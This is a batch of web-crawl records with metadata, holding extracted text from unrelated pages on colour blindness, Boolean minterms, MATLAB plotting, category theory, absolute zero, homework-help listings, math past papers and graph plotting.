population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.52440715,"math_prob":0.7951825,"size":3654,"snap":"2020-24-2020-29","text_gpt3_token_len":1630,"char_repetition_ratio":0.12986301,"word_repetition_ratio":0.011090573,"special_character_ratio":0.5621237,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9930111,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-01T16:23:18Z\",\"WARC-Record-ID\":\"<urn:uuid:e6cfa519-3672-4d1f-b412-1c5dcd2713d6>\",\"Content-Length\":\"36171\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:810fa515-e1f4-458f-bf63-a4bd96b7ffa1>\",\"WARC-Concurrent-To\":\"<urn:uuid:892ed9e2-2a6f-43ae-bc16-50af31ebf48b>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/012a34\",\"WARC-Payload-Digest\":\"sha1:A7EWH3SHGTRH5RHCAYD6NADKNFBBMBUG\",\"WARC-Block-Digest\":\"sha1:WRQJ3MKEFUXE46BB5EJMAIXAMWXYJYFG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347419056.73_warc_CC-MAIN-20200601145025-20200601175025-00011.warc.gz\"}"}
https://bookofproofs.github.io/branches/logic/literals-minterms-and-maxterms.html
[ "Before we learn more about particular types of types of canonical normal forms, we will introduce some auxiliary definitions and a lemma.\n\n# Definition: Literals, Minterms, and Maxterms\n\nLet $\\phi$ be a proposition with the Boolean variables $x_1,\\ldots,x_n.$ * Every occurence of $x_i$ and/or its negation $\\neg x_i$ in $\\phi$ is called a literal. We denote a literal by $(\\neg)x_i.$ * Every conjunction of literals $(\\neg)x_1\\wedge \\ldots \\wedge (\\neg)x_n$ is called a minterm. * Every disjunction of literals $(\\neg)x_1\\vee \\ldots \\vee (\\neg)x_n$ is called a maxterm.\n\nDefinitions: 1\nExamples: 2\nLemmas: 3 4\nProofs: 5 6\n\nGithub:", null, "### References\n\n#### Bibliography\n\n1. Mendelson Elliott: \"Theory and Problems of Boolean Algebra and Switching Circuits\", McGraw-Hill Book Company, 1982\n2. Hoffmann, Dirk: \"Theoretische Informatik, 3. Auflage\", Hanser, 2015" ]
[ null, "https://github.com/bookofproofs.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71642184,"math_prob":0.99342066,"size":572,"snap":"2023-40-2023-50","text_gpt3_token_len":174,"char_repetition_ratio":0.13380282,"word_repetition_ratio":0.0,"special_character_ratio":0.28846154,"punctuation_ratio":0.11818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9917895,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-26T23:38:35Z\",\"WARC-Record-ID\":\"<urn:uuid:1296d0a9-a1c7-4828-a6ce-fdc60dcea8b9>\",\"Content-Length\":\"9241\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:96067229-fb98-43ec-b881-7e5ad5c830bb>\",\"WARC-Concurrent-To\":\"<urn:uuid:1671c4e9-21f0-45ba-b756-24b76efe3ec5>\",\"WARC-IP-Address\":\"185.199.111.153\",\"WARC-Target-URI\":\"https://bookofproofs.github.io/branches/logic/literals-minterms-and-maxterms.html\",\"WARC-Payload-Digest\":\"sha1:UFESPPMNAYCEL34FWIUCVUJWEIAX3UJO\",\"WARC-Block-Digest\":\"sha1:ZA2FNTY3S3HRO746CGKJ6WSWY4RFTN2S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510225.44_warc_CC-MAIN-20230926211344-20230927001344-00402.warc.gz\"}"}
https://au.mathworks.com/matlabcentral/answers/268987-plotting-a-mean-line-on-a-graph?s_tid=prof_contriblnk
[ "# Plotting a mean line on a graph\n\n198 views (last 30 days)\nOm on 19 Feb 2016\nAnswered: jgg on 19 Feb 2016\nHi everyone\nI currently have a graph that looks like this\nfigure plot(t,r(ix,:),'r'); hold on plot(t,r(~ix,:),'b'); xlabel('Time (ms)') ylabel('R (Y Axis)')\nIt is essentially a sine graph that tapers off.\nWhat I want to do is add a line where matlab will plot the mean,\nOne for the value x, one for the value ~x, and one overall.\n\njgg on 19 Feb 2016\n%set up\nx = 1:0.1:10;\nr = sin(x);\nt = 1:91;\nx = mod(t,2) == 0;\nm_x = mean(r(x));\nm_x2 = mean(-r(~x));\n% plotting\nfigure\nplot(t(x),r(x),'b')\nhold on\nplot(t(~x),-r(~x),'r')\nplot(t,ones(length(t),1)*m_x)\nplot(t,ones(length(t),1)*m_x2)\nYou can do it like this; the only operative part you need to do is:\nm_x = mean(r(x));\nplot(t,ones(length(t),1)*m_x)\nWhich in your code would like slightly different since you appear to have r as a matrix instead of a vector." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8422101,"math_prob":0.9985308,"size":1048,"snap":"2022-27-2022-33","text_gpt3_token_len":323,"char_repetition_ratio":0.10057471,"word_repetition_ratio":0.0,"special_character_ratio":0.33301526,"punctuation_ratio":0.1634981,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99995077,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-04T08:52:29Z\",\"WARC-Record-ID\":\"<urn:uuid:c7b174f5-0748-46c1-a52f-a95d97315cab>\",\"Content-Length\":\"110477\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:873492c7-dcee-4dc6-9bac-4300a5dd9cf7>\",\"WARC-Concurrent-To\":\"<urn:uuid:2134230e-5945-43ff-a692-e2564abc47c4>\",\"WARC-IP-Address\":\"104.68.243.15\",\"WARC-Target-URI\":\"https://au.mathworks.com/matlabcentral/answers/268987-plotting-a-mean-line-on-a-graph?s_tid=prof_contriblnk\",\"WARC-Payload-Digest\":\"sha1:66T3AKKIDYSCFISGN22MT37TUP5AJIGT\",\"WARC-Block-Digest\":\"sha1:FZOHC6GUESXGRJJV7U7CBYV5G5IF26R2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104364750.74_warc_CC-MAIN-20220704080332-20220704110332-00336.warc.gz\"}"}
https://math.stackexchange.com/questions/2450291/transferring-t-structures-via-adjoint-functors
[ "# Transferring $t$-structures via adjoint functors\n\nIn Gaitsgory and Rozenblyum's Derived Algebraic Geometry book, they frequently use the following technique to transfer a $t$-structure from one category to another (for example, 1.5 in this paper or page 58 of this paper). The claim is (I think -- maybe some hidden assumptions?):\n\nLet $F: C \\rightarrow D$ be an exact functor which is a left adjoint, and suppose $D$ has a $t$-structure. Then, we define $C^{\\leq 0}$ to be the full subcategory whose objects satisfy $F(X) \\in D^{\\leq 0}$. We define $C^{\\geq 1}$ to be the right orthogonal to $C^{\\leq 0}$. This defines a $t$-structure.\n\nFor example, in the first link, a proposition in Lurie's Higher Algebra is referenced. But this proposition assumes that the functor in question is a localization functor, which is exactly what I'm not sure about.\n\nHere's an attempt. Let $Y \\in C$. Then, there is an exact triangle $X \\rightarrow FY \\rightarrow Z$ where $X \\in D^{\\leq 0}$ and $Z \\in D^{\\geq 1}$. We have a map $Y \\rightarrow GZ$ where $G$ is the right adjoint -- one can check that the right adjoint takes $D^{\\geq 1}$ to $C^{\\geq 1}$. The claim is that the fiber (i.e. cocone) of $Y \\rightarrow GZ$ is in $C^{\\leq 0}$.\n\nNow, the only way to check this is to apply $F$. Since $F$ is exact, we have $$F(cocone) \\rightarrow FX \\rightarrow FGZ$$ However, it's not clear that the cocone of $FX \\rightarrow FGZ$ is in $D^{\\leq 0}$ to me." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88566643,"math_prob":0.999345,"size":1384,"snap":"2021-43-2021-49","text_gpt3_token_len":425,"char_repetition_ratio":0.13043478,"word_repetition_ratio":0.0,"special_character_ratio":0.29696533,"punctuation_ratio":0.10726643,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999677,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-17T16:51:42Z\",\"WARC-Record-ID\":\"<urn:uuid:a944c3b9-d90c-43af-8caa-381e6fefce61>\",\"Content-Length\":\"161026\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bcf537f5-06da-4a31-b4e6-85eddd6bc557>\",\"WARC-Concurrent-To\":\"<urn:uuid:e244334b-7af5-48dd-a420-8b4446889cd4>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/2450291/transferring-t-structures-via-adjoint-functors\",\"WARC-Payload-Digest\":\"sha1:XPL6KN2D3DPM4JC2UC2C6GDMJ7K62CUZ\",\"WARC-Block-Digest\":\"sha1:MVXYUMK4KEN5TE2E5XHO35XMLJ4UGKG7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585178.60_warc_CC-MAIN-20211017144318-20211017174318-00562.warc.gz\"}"}
http://humanthermodynamics.wikifoundry.com/page/absolute+zero
[ "# Absolute zero", null, "At absolute zero (0 K or -273 ˚C), according to the kinetic theory of heat, particle movement should stop.\nIn physics, absolute zero refers to a zero indicator reading on an absolute temperature scale.\n\nHistory\nIn 1703, Guillaume Amontons, a French physicist, mathematically derived the idea of an “absolute zero”. \n\n“It appears that the ‘extreme cold’ [absolute zero] of this thermometer is that which would reduce the air by its ‘spring’, to sustain no load at all.”\n— Guillaume Amontons (1703), Publication \n\nIn c.1780, William Irvine, based on the theories of Joseph Black, supposedly, calculated absolute zero; the following is a synopsis:\n\n“Irvine’s particular theory was basically very simple in that the took the concept of ‘quantity of heat’ to its logical conclusion. Each and every body, according to Irving, contains a certain ‘absolute quantity of heat’, which is fixed by its heat capacity and its absolute temperature. If, for any reason, the heat capacity of a body should change then it must either emit or absorb heat; thus, the heats of combustion, of chemical reactions in general and the latent heats of fusion and vaporization are merely the consequences of abrupt changes in the heat capacities of the substances concerned. In fact, all productions or absorptions of heat indicate changes in heat capacity. Now this theorem enabled Irvine and his followers to calculate the absolute zero of temperature.”\nDonald Cardwell (1971), From Watt to Clausius (pg. 55)\n\nIn 1848, Scottish physicist William Thomson publishes his “On an Absolute Thermometric Scale founded on Carnot’s Theory of the Motive Power of Heat, and Calculated from Regnault’s Observations”, in which he bases the concept of thermodynamics-based “absolute thermometric scale” on the 1824 formula for heat engine efficiency of French physicist Sadi Carnot. \n\nIn 1925, Albert Einstein and Satyenda Bose predicted a new state of matter at ultra-low temperatures.\n\nIn 1995, Einstein and Bose's \"new state of matter\", called Bose-Einstein condensate, is created at 1.7E-7 K by Americans Eric Cornell and Carl Wieman at Colorado University, Boulder.\n\nEntropy at absolute zero\nIn 1905, German physicist Walther Nernst introduced his heat theorem, later coming to be known as the third law of thermodynamics, which showed that absolute zero is unattainable. The essential problem Nernst tackled is that the state function formulation of heat Q called ‘equivalence-value’ (renamed 'entropy' in 1865), introduced formulaically by German physicist Rudolf Clausius in 1854 as:", null, "$\\frac{Q}{T}$", null, "The division by zero problem: as x approaches 0 from the right, in the function y = 1/x, the value of y approaches infinity. As x approaches 0 from the left, y approaches minus infinity. On this logic, in the function S = Q/T, s approaches infinity as T approaches 0, for both positive or negative values of heat flow.\n\nverbally defined as the \"generation of the quantity of heat Q of the temperature T from work\" becomes an infinite or undefined when the temperature becomes zero:", null, "$\\frac{Q}{0} \\,$\n\nwhich thus leads to an unexplained inconsistency in the second law of thermodynamics at absolute zero. In other words, the possibility that there exists an actual state in nature of zero degrees temperature introduces the \"division by zero\" issue of mathematical functions. In an alternative sense, both heat flow and temperature could simultaneously reach zero at absolute zero, giving the function S = 0/0, another non-computable result.\n\nReferences\n1. Shachtman, Tom. (1999). Absolute Zero and the Conquest of Cold (absolute zero: historical timeline, pgs. ix-x). Mariner Books.\n2. Thomson, William. (1848). “On an Absolute Thermometric Scale Founded on Carnot’s Theory of the Motive Power of Heat” (pgs. 100-06), Cambridge Philosophical Society Proceedings for June 5; and Phil. Mag., Oct. 1848.\n3. Division by zero – Wikipedia.\n4. James, W.S. (1929). “The Discovery of the Gas Laws. II. Gay-Lussac’s Law” (abs), Science Progress in the Twentieth Century (1919-1933), 24(93):57-71." ]
[ null, "https://wikifoundryimages.s3.amazonaws.com/X71iNL2SZEGMA_DpPtpwFg11436", null, "https://wikifoundryimages.s3.amazonaws.com/PqsWEdCt1yFqWKlRqC_3PQ346 ", null, "https://wikifoundryimages.s3.amazonaws.com/7NNoZcwusVvSj3z8VQlz5Q20018", null, "https://wikifoundryimages.s3.amazonaws.com/w_cS74WPHBURCCGVaOdfrA328 ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8914967,"math_prob":0.84662086,"size":4027,"snap":"2022-27-2022-33","text_gpt3_token_len":926,"char_repetition_ratio":0.122793935,"word_repetition_ratio":0.01904762,"special_character_ratio":0.234666,"punctuation_ratio":0.13907285,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97999823,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,2,null,4,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-13T09:54:12Z\",\"WARC-Record-ID\":\"<urn:uuid:794a4ae5-0f9c-46bd-9dd1-9503910ff1dc>\",\"Content-Length\":\"16358\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1b29f990-127d-4844-93a3-a5423d0ec5b4>\",\"WARC-Concurrent-To\":\"<urn:uuid:bea43fac-c0c6-445d-957a-70df0ef1093a>\",\"WARC-IP-Address\":\"52.70.238.32\",\"WARC-Target-URI\":\"http://humanthermodynamics.wikifoundry.com/page/absolute+zero\",\"WARC-Payload-Digest\":\"sha1:RKZQ3UXD72S2CTCOZFLPOWVWT5WO7O7J\",\"WARC-Block-Digest\":\"sha1:3BH2XYOPZOCXCPAHB7BZZ4CJ3Y7I53RU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571911.5_warc_CC-MAIN-20220813081639-20220813111639-00474.warc.gz\"}"}
https://allessays.online/design-and-write-an-object-oriented-program-in-c-that-meets-the/
[ "Get help from the best in academic writing.\n\n# Design and write an Object Oriented program in C that meets the\n\nQuestion Design and write an Object Oriented program in C that meets the requirements shown below. provide a suitable menu with an exit option in your main program. (DATA SAMPLE IS IN ATTACHED IMAGE BELOW:-)create date class, time class and vector class.The first field contains both the date and time. You will need to split the date and time values. create date class so, date can be stored in the Date class. You need to create Time class to store time values.Vector.h contains the following: #ifndef VECTOR_H#define VECTOR_H// The class declaration must have doxygen comments – put these intemplate\n\n## We are using Python. DO NOT USE CONTINUE, BREAK,\n\nQuestion\n\nWe are using Python. DO NOT USE CONTINUE, BREAK, OR SORTED(). also DO NOT IMPORT ANYTHING ELSE. This is the question. I have my own code and plan to submit my own code, but I can’t figure out how to get past the point i am stuck on. Again, even a nudge in the correct direction would be helpful. from typing import List, Tuple, Dict, TextIO def recommend_clubs( person_to_friends: Dict[str, List[str]], person_to_clubs: Dict[str, List[str]], person: str,) –\n\n## This is from Statistics and Probability, Jupyter Project 2 written\n\nQuestion This is from Statistics and Probability, Jupyter Project 2 written in python. Having trouble with the coding for step 4.. Step 3: Hypothesis Test for the Population Mean (I)A relative skill level of 1420 represents a critically low skill level in the league. The management of your team has hypothesized that the average relative skill level of your team in the years 2013-2015 is greater than 1420. Test this claim using a 5% level of significance. For this test, assume that the population standard deviation for relative skill level is unknown. Make the following edits to the code block below: -Replace jQuery22407530793663682149_1575394441358DATAFRAME_YOUR_TEAMjQuery22404996412957777534_1575394519195 with the name of your team’s dataframe. See Step 2 for the name of your team’s dataframe. -Replace ??RELATIVE_SKILL?? with the name of the variable for relative skill. See the table included in the Project Two instructions above to pick the variable name. Enclose this variable in single quotes. For example, if the variable name is var2 then replace ??RELATIVE_SKILL?? with ‘var2’. -Replace ??NULL_HYPOTHESIS_VALUE?? with the mean value of the relative skill under the null hypothesis.After you are done with your edits, click the block of code below and hit the Run button above.In :import scipy.stats as st ​ # Mean relative skill level of your team mean_elo_your_team = your_team_df[‘elo_n’].mean() print(“Mean Relative Skill of your team in the years 2013 to 2015 =”, round(mean_elo_your_team,2)) ​ ​ # Hypothesis Test # —- TODO: make your edits here —- test_statistic, p_value = st.ttest_1samp(your_team_df[‘elo_n’], 1420) ​ print(“Hypothesis Test for the Population Mean”) print(“Test Statistic =”, round(test_statistic,2)) print(“P-value =”, round(p_value,4)) Output: Mean Relative Skill of your team in the years 2013 to 2015 = 1440.49 Hypothesis Test for the Population Mean Test Statistic = 4.04 P-value = 0.0001 Step 4: Hypothesis Test for the Population Mean (II)A team averaging 110 points is likely to do very well during the regular season. The coach of your team has hypothesized that your team scored at an average of less than 110 points in the years 2013-2015. Test this claim at a 1% level of significance. For this test, assume that the population standard deviation for relative skill level is unknown. -The dataframe for your team is called your_team_df. -The variable ‘pts’ represents the points scored by your team. -Calculate and print the mean points scored by your team during the years you picked. -Identify the mean score under the null hypothesis. You only have to identify this value and do not have to print it. (Hint: this is given in the problem statement) -Assuming that the population standard deviation is unknown, use Python methods to carry out the hypothesis test. -Calculate and print the test statistic rounded to two decimal places. -Calculate and print the P-value rounded to four decimal places.\n\n## Python : The CNN Money’s Market Movers website (money.cnn.com/data/hotstocks/ )", null, "Question Python : The CNN Money’s Market Movers website (money.cnn.com/data/hotstocks/ ) tracks the most active stocks on a real time basis. Specifically, the most active, the top gainers andtop losers are listed at any instance in time. Write Python scripts that collect the list ofmost actives, gainers and losers from the above website. Next, programs should take the tickersymbols and names of these companies (and categories) and build a csv file (called stocks.csv) withdata about each stock from the website: finance.yahoo.com/quote/AMD?p=AMD\n\n## How can I include an attachment? I need corrections on a flowchart provided.\n\nQuestion How can I include an attachment? I need corrections on a flowchart provided. Suppose matinee movie tickets are priced at \\$5.50 each for movies BEFORE 6:00 PM (less than), and \\$10.00 each after that time. The following program flowchart was designed to prompt the user for the time of the movie and how many tickets the user wishes to purchase, then makes and displays the price using the correct calculation. (For this problem, do not worry about AM versus PM.)However, there are a number of errors. Use the directions posted in this folder and make the corrections.\n\nQuestion Using pandas\nClick on the following link and download the dataset. The dataset contains information about more than 37000 bank accounts. https://www.dropbox.com/s/j41kxvjc6uraurn/Banking Dataset.csv?dl=0Describe all the numeric variables. • The duration variable have very small and very large numbers. create a new column and divide all the duration values by 30 and add it to that new column (call this column ‘duration_month’). In fact you are creating a new column in which you can see the duration in months. To learn how to add a new calculated column to a pandas dataframe open the following link. https://stackoverflow.com/questions/18504967/pandas-dataframe-create-new-columns-and-fill-with-calculated-values-from-same-df\n\n## The program accepts a student’s data as follows: GID number\n\nQuestion The program accepts a student’s data as follows: GID number first and last name major field of study grade point averageDisplay the words, “HONOR ROLL” if the student’s grade point average is 3.0 or better. The input comes from the keyboard, not a file, and an array is not needed. Please find and correct the errors according to the direction in this folder.start declarations num gid num firstName num lastName num majorStudy num gpa num QUIT = “YES” num quitNow housekeeping() while quitNow QUIT processLoop() endwhile eoj()stop housekeeping() quitNow=”N”return processLoop()input gidinput firstNameinput lastNameinput majorStudyinput GPAif gpa<=3.0output \"HONOR ROLL\"endifoutput \"Do you want to quit? Y or N?\" eoj() output \"End of program.\"stop\n\n## Hello, looking for help on this Java program below: import java.util.Random;\n\nQuestion Hello, looking for help on this Java program below: import java.util.Random; /** This class compares the efficiency of Selection Sort, Insertion Sort, Shell Sort, Other Shell Sort, Bubble Sort, and Better Bubble Sort. @author */public class SortComparisons{ private int counter; private Random r; private int[] list1, list2, list3, list4, list5, list6; public SortComparisons() { counter = 0; r = new Random(); testComparisons(); } /** Tests the number of comparisons between the different sorting algorithms. */ public void testComparisons() { for (int x = 2; x <= 4096; x *= 2) { populateLists(x); System.out.println(\"With arrays of size \" x \"…\"); counter = 0; selectionSort(list1, 0, x – 1); System.out.println(\"Selection Sort makes \" counter \" comparisons\"); counter = 0; insertionSort(list2, 0, x – 1); System.out.println(\"Insertion Sort makes \" counter \" comparisons\"); counter = 0; shellSort(list3, 0, x – 1); System.out.println(\"Shell Sort makes \" counter \" comparisons\"); counter = 0; otherShellSort(list4, 0, x – 1); System.out.println(\"A modified Shell Sort makes \" counter \" comparisons\"); counter = 0; bubbleSort(list5, 0, x – 1); System.out.println(\"A Bubble Sort makes \" counter \" comparisons\"); counter = 0; betterBubbleSort(list6, 0, x – 1); System.out.println(\"A better Bubble Sort makes \" counter \" comparisons\"); System.out.println(); } // end for } // end testComparisons /** Fills each list with random integers in the same order. @param size The number of random integers to fill in. */ public void populateLists(int size) { list1 = new int[size]; list2 = new int[size]; list3 = new int[size]; list4 = new int[size]; list5 = new int[size]; list6 = new int[size]; int index = 0; while (index 0. */ public void selectionSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method getIndexOfSmallest. } // end selectionSort // Finds the index of the smallest value in a portion of an array a. // Precondition: a.length > last >= first >= 0. // Returns the index of the smallest value among // a[first], a[first 1], . . . , a[last]. private int getIndexOfSmallest(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD } // end getIndexOfSmallest /** Sorts using the recursive Insertion Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void insertionSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method insertInOrder. } // end insertionSort // Inserts an element into the appropriate location in the given // array, between first and last. private void insertInOrder(int element, int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD } // end insertInOrder /** Sorts using the Shell Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void shellSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method incrementalInsertionSort. } // end shellSort /** Sorts equally spaced elements of an array into ascending order, used for shell sort. @param a an array of Comparable objects. @param first An integer >= 0 that is the index of the first array element to consider. @param last An integer >= first and < a.length that is the index of the last array element to consider. @param space The difference between the indices of the elements to sort. */ private void incrementalInsertionSort(int[] a, int first, int last, int space) { // ADD CODE HERE TO MISSING METHOD } // end incrementalInsertionSort /** Sorts using the modified Shell Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void otherShellSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the method incrementalInsertionSort. } // end otherShellSort /** Sorts using the Bubble Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void bubbleSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method order. } // end bubbleSort // Swaps the array the array entries a[i] and a[j] if necessary private void order(int[] a, int i, int j) { // ADD CODE HERE TO MISSING METHOD } // end order // ——————————————————————————- /** Sorts using a better Bubble Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void betterBubbleSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method swap. } // end betterBubbleSort // Swaps the array entries a[i] and a[j]. private static void swap(int[] a, int i, int j) { int temp = a[i]; a[i] = a[j]; a[j] = temp; } // end swap // Tests various sorting methods public static void main(String[] args) { new SortComparisons(); } // end main} // end SortComparisons\n\n### Essay Writing at AllEssays.Online\n\n4.9 rating based on 17,037 ratings\n\n17037 reviews\n\nReview This Service\n\nRating:" ]
[ null, "https://allessays.online/wp-content/uploads/2020/05/tUMLUVNL7mLbFO3sDXcq.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69525814,"math_prob":0.77173334,"size":11698,"snap":"2021-31-2021-39","text_gpt3_token_len":2800,"char_repetition_ratio":0.11604241,"word_repetition_ratio":0.24919441,"special_character_ratio":0.2586767,"punctuation_ratio":0.14521301,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9590745,"pos_list":[0,1,2],"im_url_duplicate_count":[null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-04T00:19:35Z\",\"WARC-Record-ID\":\"<urn:uuid:fdc07ebc-bf35-4271-8d8a-a2f967a55b0e>\",\"Content-Length\":\"83925\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:190d1d35-45fa-42af-9306-58a8d9aa6ae4>\",\"WARC-Concurrent-To\":\"<urn:uuid:d68a62ca-ea4e-4a88-814d-2a1404bb4d1c>\",\"WARC-IP-Address\":\"162.213.255.18\",\"WARC-Target-URI\":\"https://allessays.online/design-and-write-an-object-oriented-program-in-c-that-meets-the/\",\"WARC-Payload-Digest\":\"sha1:CJEOYB7QHTHYNOC656BC52JDF4DTK6AI\",\"WARC-Block-Digest\":\"sha1:5SXEX6PKIT53XX6YQYZXC5UF67QVEF6W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154486.47_warc_CC-MAIN-20210803222541-20210804012541-00249.warc.gz\"}"}
https://oalevelsolutions.com/tag/polynomials-cie-p2-2009/
[ "# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | May-Jun | (P2-9709/02) | Q#8\n\nQuestion a)   Find the equation of the tangent to the curve at the point where . b)                  i.       Find the value of the constant A such that           ii.       Hence show that Solution a.     We are given that curve with equation  and […]\n\n# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | Oct-Nov | (P2-9709/22) | Q#5\n\nQuestion The polynomial , where a is a and b are constants, is denoted by . It is given that  and (x − 2) are factors of p(x). i.       Find the values of a and b.    ii.       When a and b have these values, find the other linear factor of p(x). […]\n\n# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | Oct-Nov | (P2-9709/21) | Q#3\n\nQuestion The polynomial , where a is a constant, is denoted by . It is given that  is a factor of . i.Find the value of  .    ii. When  has this value, factorise  completely. Solution      i.  We are given that;    We are also given that is a factor of . We […]\n\n# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | May-Jun | (P2-9709/02) | Q#6\n\nQuestion The polynomial , where a and b are constants, is denoted by . It is given that   is a factor of , and that when  is divided by    the remainder is 4. i.       Find the values of  and . ii.       When  and  have these values, find the other two […]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8245016,"math_prob":0.94030935,"size":384,"snap":"2022-05-2022-21","text_gpt3_token_len":108,"char_repetition_ratio":0.118421055,"word_repetition_ratio":0.0,"special_character_ratio":0.328125,"punctuation_ratio":0.056338027,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9950454,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-18T04:24:29Z\",\"WARC-Record-ID\":\"<urn:uuid:40aa1d85-8c1c-4505-9c37-836dcb12e8d2>\",\"Content-Length\":\"39063\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ec1f5d76-6cd2-48d9-b9a7-c4d3a3fca922>\",\"WARC-Concurrent-To\":\"<urn:uuid:1345d683-2a64-4373-950f-0a5aa79584fc>\",\"WARC-IP-Address\":\"68.65.122.178\",\"WARC-Target-URI\":\"https://oalevelsolutions.com/tag/polynomials-cie-p2-2009/\",\"WARC-Payload-Digest\":\"sha1:3RH7VL37XH63PJMAFRRZ5VLY6KN4IBBG\",\"WARC-Block-Digest\":\"sha1:34KXAXLHRV5FEUCWS2MY6BRRGPY6XXYP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662521041.0_warc_CC-MAIN-20220518021247-20220518051247-00018.warc.gz\"}"}
https://www.teachoo.com/8418/2137/Example-6/category/Examples/
[ "Examples\n\nChapter 13 Class 8 Introduction to Graphs\nSerial order wise", null, "", null, "Learn in your speed, with individual attention - Teachoo Maths 1-on-1 Class\n\n### Transcript\n\nExample 3 (Quantity and Cost) - Chapter 15 Class 8 Introduction to Graphs The following table gives the quantity of petrol and its cost. No. of liters of petrol | 10 | 15 | 20 | 25 Cost of petrol in rupees | 500 | 750 | 1000 | 1250 Plot a graph to show the data. Plotting graph Putting Cost in rupees in y-axis, from 100 to 1300 and Liters of petrol in x-axis, from 5 to 30 We plot points, and join the line", null, "" ]
